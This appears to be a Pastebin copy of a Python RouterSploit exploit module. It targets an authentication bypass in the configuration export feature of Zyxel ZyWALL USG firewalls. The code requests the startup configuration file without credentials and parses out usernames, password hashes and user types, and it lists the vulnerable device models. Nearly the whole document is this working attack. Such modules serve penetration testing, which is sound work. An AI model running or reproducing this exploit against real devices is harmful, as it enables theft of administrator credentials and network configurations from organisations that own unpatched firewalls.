API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 23rd, 2019
299
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
raw download clone embed print report
  1. import re
  2. from routersploit.core.exploit import *
  3. from routersploit.core.http.http_client import HTTPClient
  4.  
  5.  
  6. class Exploit(HTTPClient):
  7. __info__ = {
  8. "name": "Zyxel ZyWALL USG Extract Hashes",
  9. "description": "Exploit implementation for ZyWall USG 20 Authentication Bypass In Configuration Import/Export. "
  10. "If the tharget is vulnerable it allows to download configuration files which contains "
  11. "sensitive data like password hashes, firewall rules and other network related configurations.",
  12. "authors": (
  13. "RedTeam Pentesting", # vulnerability discovery
  14. ),
  15. "references": (
  16. "https://www.exploit-db.com/exploits/17244/",
  17. ),
  18. "devices": (
  19. "ZyXEL ZyWALL USG-20",
  20. "ZyXEL ZyWALL USG-20W",
  21. "ZyXEL ZyWALL USG-50",
  22. "ZyXEL ZyWALL USG-100",
  23. "ZyXEL ZyWALL USG-200",
  24. "ZyXEL ZyWALL USG-300",
  25. "ZyXEL ZyWALL USG-1000",
  26. "ZyXEL ZyWALL USG-1050",
  27. "ZyXEL ZyWALL USG-2000",
  28. ),
  29. }
  30. target = OptIP("", "Target IPv4 or IPv6 address")
  31. port = OptPort(443, "Target HTTP port")
  32. ssl = OptBool(True, "SSL enabled: true/false")
  33.  
  34. def __init__(self):
  35. self.credentials = []
  36.  
  37. def run(self):
  38. self.credentials = []
  39.  
  40. if self.check():
  41. print_success("Target appears to be vulnerable")
  42. print_table(("Username", "Hash", "User type"), *self.credentials)
  43. else:
  44. print_error("Exploit failed - target seems to be not vulnerable")
  45.  
  46. @mute
  47. def check(self): # todo: requires improvement
  48. path = "/cgi-bin/export-cgi/images/?category={}&arg0={}".format('config', 'startup-config.conf')
  49. response = self.http_request(
  50. method="GET",
  51. path=path
  52. )
  53.  
  54. if response is not None and response.status_code == 200:
  55. for line in response.text.split("\n"):
  56. line = line.strip()
  57. m_groups = re.match(r"username (.*) password (.*) user-type (.*)", line, re.I | re.M)
  58. if m_groups:
  59. self.credentials.append((m_groups.group(1), m_groups.group(2), m_groups.group(3)))
  60.  
  61. if self.credentials:
  62. return True # target is vulnerable
  63.  
  64. return False # target is not vulnerable
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!